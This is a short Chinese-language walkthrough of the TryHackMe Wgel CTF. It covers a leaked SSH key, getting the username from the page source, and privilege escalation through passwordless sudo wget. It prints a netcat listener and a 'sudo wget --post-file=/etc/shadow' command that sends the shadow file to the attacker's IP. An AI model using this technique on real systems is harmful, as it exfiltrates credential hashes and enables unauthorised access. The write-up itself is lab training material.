TryHackMe-Wget-CTF

靶机在线链接:Wgel-CTF

靶机难度:十分简单

nmap扫描端口后发现开放了两个服务
nmap

进一步扫描之后,发现有.ssh目录,私钥文件泄露

dirb

id-rsa

有私钥文件,但是没用户名啊..查看了sitemap目录的用户作者,分别猜测DaveMiller用户名,但是都不正确.

只好重头开始找线索,发现这个页面有点不正常,查看页面源代码之后发现
index
code
原来这里已经给出了用户名…说明细节是多么的重要啊!
使用index源代码给的用户名成功登录
login

登录进来后,并没有直接在家目录下看到flag,搜索一下

1
find ./ -name "*flag*"

flag

拿到第一个flag了,让我们看看当前用户的sudo权限
sudo

虽然这个用户是超级管理员,但是我们不知道他的密码,但是我们还有一个不需要密码就能以root身份运行的程序呢wget

虽然wget不能直接被我们用于提权,但是我们可以用它来读取root用户下我们不该读取的配置文件.如/etc/shadow诸如此类的.

所以我们要这样利用,首先,我们在攻击机中先开启一个监听,并把接受到的内容重定向到一个文件中

1
nc -lvp 1234 > hash

接着在我们的jessie用户的终端上输入

1
sudo wget --post-file='/etc/shadow' Listen-IP:Port

Listen-IP和端口,是攻击方的ip和监听的端口

此时再查看hash文件,就有目标机器/etc/shadow文件的信息了
/etc/shadow

不过,我们的目标只是root_flag.
root-flag
flag

总结一下:学会了sudo wget读取文件的操作

参考链接:linux-for-pentester-wget-privilege-escalation